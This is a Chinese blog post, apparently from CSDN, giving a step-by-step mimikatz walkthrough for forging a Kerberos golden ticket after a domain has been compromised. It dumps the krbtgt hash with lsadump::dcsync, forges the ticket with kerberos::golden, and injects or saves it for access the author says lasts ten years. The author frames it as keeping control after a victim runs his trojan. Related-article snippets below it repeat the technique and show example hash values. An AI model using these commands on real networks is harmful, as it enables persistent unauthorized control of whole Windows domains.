域渗透——黄金票据

已于 2024-12-06 11:13:32 修改
阅读量985 收藏 5
点赞数 22
CC 4.0 BY-SA版权
文章标签: 安全 网络安全 系统安全
于 2024-12-06 11:10:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ygylemon/article/details/144285022

黄金票据一般是对域内渗透提权之后,进行维权的一种操作。我想要上线这台服务器,对方也不能乖乖听话一直点我的木马吧,只好打一张黄金票据了,方便以后的管理操作。

首先我们通过上一篇文章已经获得了域管理员的权限。

接下来就是维权了

主要利用的是mimikatz,(个人偏向cs),主要是把过程弄清楚明白,cs的维权操作确实很方便,话不多说。

kerberos::golden 在mimikatz里看一眼要什么参数

mimikatz.exe

privilege::debug

kerberos::   看一眼参数,选择golden

上方提示缺少user参数,那我们就加上参数
接下来又分别提示了确实domain和krbtgt参数

krbtgt参数也可以通过mimikatz的lsadump模块筛选出来,话不多说,上命令就好了

lsadump::dcsync/domain:(你的域名) /user:krbtgt

把ntml值复制下来,会用到的

接下来,whoami /all看一眼sid

下面是完整的命令:

kerberos::golden /user:(任意) /domain:(想干的域名) /sid:(不附加任何权限值) /krbtgt:(mimiktz导出的ntlm) /endin:480 /renewmax:10080 /ptt

一张金票就制作好了

然后在猕猴桃里在cmd里看一眼klist,看看票据是否制作成功

猕猴桃里用kerberos::list

如果想把金票保存的话,可以用这条命令

kerberos::golden /user:(任意) /domain:(想干的域名) /sid:(不附加任何权限值) /krbtgt:(mimiktz导出的ntlm) /endin:480 /renewmax:10080 /ticket:ticket.kirbi   

 ticket.kirbi是保存的名字,保存在当前目录下

也就是这个东西,有十年的权限,好了至此,抓hash,提权,接管,维权完毕

ygylemon
关注
[渗透测试笔记] 49.域渗透黄金票据和白银票据
H4ppyD0g的博客
03-17 4697
Kerberos认证协议 《信息系统安全概论》书中对kerberos协议流程做了简化,如下所示 在此用下图做说明 KDC(密钥分发中心)包含身份认证服务器和服务审批服务器(用于票据授权服务TGS) DC是域控制器;AD是活动目录。 DC中有一个特殊用户叫做:krbtgt,它是一个无法登录的账户,是在创建域时系统自动创建的,在整个kerberos认证中会多次用到它的Hash值去做验证。 AD会维护一个Account Database(账户数据库). 它存储了域中所有用户的密码Hash和白名单。只有账户密码
内网渗透——windows认证
战神/calmness的博客
10-01 369
目录 windows密码Hash NTLM hash NET-NTLM hash NTLM 认证 域环境中 Kerberos协议 1.用户登陆 2.请求身份认证 3. 请求服务授权 客户端向TGS发送请求服务授权请求 TGS为Client响应服务授权票据 4.发送服务请求 Client向Service Server发送服务请求 SS响应Client 认证流程中需要关注的点,票据伪造的原理 在域渗透中,横向移动最重要是对windows认证协议的理解 windows密码H.
黄金票据——域渗透
include_voidmain的博客
03-14 766
0x01前言 黄金票据是伪造票据授予票据(TGT),也被称为认证票据。攻击者一旦拿到域管权限的账号就可以伪造出黄金票据,逃过账号和密码的验证,即使修改管理员密码,攻击者依然能通过黄金票据进行访问。 0x02原理 kerberos认证中Client通过AS认证后,AS会给Client一个由Client的Master Key加密过的和TGT,Logon Session Key并不会保存在KDC中,krbtgt的NTLM Hash又是固定的,所以只要得到NTLM就能伪造TGT和Logon session key,
域渗透黄金票据
ClarkAlbert的博客
10-29 1789
域渗透黄金票据前言:1.黄金票据的原理和条件(1)原理(2)条件2.黄金票据的局限性3.绕过黄金票据局限性4.黄金票据的特点5.黄金票据防御6.实践 前言: 在了解黄金票据前,首先要清楚keberos协议,目前在windows域中采用的认证协议就是kerberos。(参考链接:https://blog.csdn.net/wy_97/article/details/87649262) 1.黄金票据的原理和条件 (1)原理 黄金票据伪造的是票据授予票据(TGT),TGT=krbtgt hash(session
域内横向渗透-PTT票据传递之黄金票据 (Golden Ticket)
m0_62783065的博客
09-22 671
PTT票据传递之黄金票据 (Golden Ticket),介绍黄金票据的原理及其使用方法
内网横向——域渗透黄金票据复现
ytdd66的博客
04-03 2129
Kerberos是一种由MIT(麻省理工大学)提出的一种网络身份验证协议。它旨在通过使用密钥加密技术为客户端/服务器应用程序提供强身份验证。其中KDC服务默认会安装在一个域的域控中,而Client和Server为域内的用户或者是服务,如HTTP服务,SQL服务。在Kerberos中Client是否有权限访问Server端的服务由KDC发放的票据来决定。
黄金票据~
Y22Lee的博客
06-04 1440
这里大家肯定有点矛盾,我既然都可以获取krbtgt,我直接使用域中的机器进行PTT就可以了,为什么还要用工作组中的机器(如果域中的机器有杀软呢?黄金票据的制作有多种方式,黄金票据本质上是伪造TGT,既然是伪造所以在任何电脑上都可以伪造,生成的TGT票据就可以打入内存(PTT),从而实现对整个域的控制,接下来我们看一下如何伪造。黄金票据一般是伪造的TGT,生成这个TGT,不需要和KDC进行校验,金票可以在本地直接生成,生成的的金票在非域机器和域内机器都可以使用。第三步:获取伪造TGT使用的域SID和域名。
内网渗透——WINDOWS认证机制之KERBEROS
我们为什么能在这里遇到?
11-12 1458
参考:ares-x 域渗透学习(二) KERBEROS协议
域渗透 白银票据配置 伪造
最新发布
03-19
### 域渗透中的白银票据黄金票据 #### 白银票据 (Silver Ticket) 的配置与伪造方法 白银票据是一种针对特定服务的伪造 Kerberos 票据。它允许攻击者冒充某个用户身份来访问指定的服务,而无需获得整个域的控制权...
[域权限维持 & 票据攻击] Golden Ticket 黄金票据制作原理及利用方式
Blue17 の 小窝
03-06 1028
Client 在与 TGS 的交互中,有了黄金票据(TGT)之后,就会自动跳过 AS 的验证即不用验证你的身份(账号和密码),然后你就可以拿着这个伪造的 TGT,去 TGS 申请任意服务,比如 ”域控的访问权“,而由于 TGT 签名是采用 Krbtgt 这个账户的密码签名的,所以即使域管改了密码,你也依旧可以拿着 ”黄金票据“ 进域控。如上,通过黄金票据,我们能轻易伪造通向域中任意计算机(包括域控)的通行证,只要目标的 Krbtgt 账户密码不更改,我们就能对这个域拥有绝对的控制权。
红日靶场渗透测试——红日靶场1(详细笔记)
热门推荐
qq_52849046的博客
05-24 1万+
这篇博客是为小编自己学习记录的同时,分享出来让大神们共同检阅,如有问题,还请各位大神在评论区多多指点。ps:此文章仅学习使用,切勿用于实战,容易被gangan
内网渗透之权限维持-黄金白银票据&隐藏账户&远控-RustDesk&GotoHTTP
m0_62207170的博客
05-18 1129
内网渗透之权限维持-黄金白银票据&隐藏账户&远控-RustDesk&GotoHTTP
内网渗透——黄金票据与白银票据
来日可期的博客
10-11 5178
黄金票据(Golden Ticket):黄金票据指的是攻击者通过获取目标环境中域控制器(Domain Controller)上的krbtgt帐户的散列值,然后使用散列值生成伪造的票据。这种伪造的票据具有极高的权限,并且不受密码更改的影响。拥有黄金票据相当于拥有域内的最高权限,攻击者可以访问和控制所有域内资源。 白银票据(Silver Ticket):白银票据是攻击者通过获取目标环境中某个服务帐户(Service Account)的散列值,并使用散列值生成伪造的票据。这种伪造的票据允许攻击者模拟该服务账户的
利用黄金票据获取域控权限
qq_54713392的博客
06-30 605
利用黄金票据获取域控权限 (1)在域控服务器上用mimikatz获取krbtgt的sid和ntlm 提权执行命令:privilege::debug 获取用户krbtgt的信息执行命令lsadump::dcsync /domain:demo.com /user:krbtgt (2)获取krbtgt的sid和ntlm(这里尤其注意要去掉502) sid S-1-5-21-2189589203-2536092258-2850724310-502 ntlm c68811b401358f8d153cdb752e2
域渗透黄金票据与白银票据
dys的博客
07-19 696
黄金票据和白银票据 kerberos协议
内网渗透--CS伪造黄金票据与白银票据
Armandhe的博客
06-24 4048
性感作者,在线翻车
域权限维持(黄金票据与白银票据)
qq_18811919的博客
03-19 2271
黄金票据和白银票据通常被认为属于票据传递攻击(Pass-the-Ticket,简称PTT)的一种。 这是一种针对Windows身份验证系统的攻击,攻击者可以利用缺陷或弱点获取用户或系统 帐户的票据信息,然后将其用于进一步攻击或访问敏感资源本篇文章注意讲述了黄金票据 与白银票据的数据包分析以及如何进行PTT攻击,讲述了多种利用方式包括CS/mimikatz/Impacket等。
Mimikatz 的使用(黄金票据的制作)
jzm__123的博客
12-18 1036
在他的工作范围内,他可以获取当前windows 的密码哈希值或者sid 和等来合成黄金票据的所需材料,这使我们的电脑十分危险,如果让我们的电脑遭受了他的攻击那么我们的会遭受到信息泄露,或者被注入病毒等一系列问题。孤独没有什么反义词,但他的近义词是自由,人生成功的道路上充满了孤独,那么也同样告诉你,你离成功后的自由不远了。黄金票据,打个比方,在生活中有一种非常牛的卡,一般存在于富豪手中,有了他,那么你就可以无所不能。username hacker (冒充的用户)3测试用的用户名(虚构的,或者用来冒充的)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值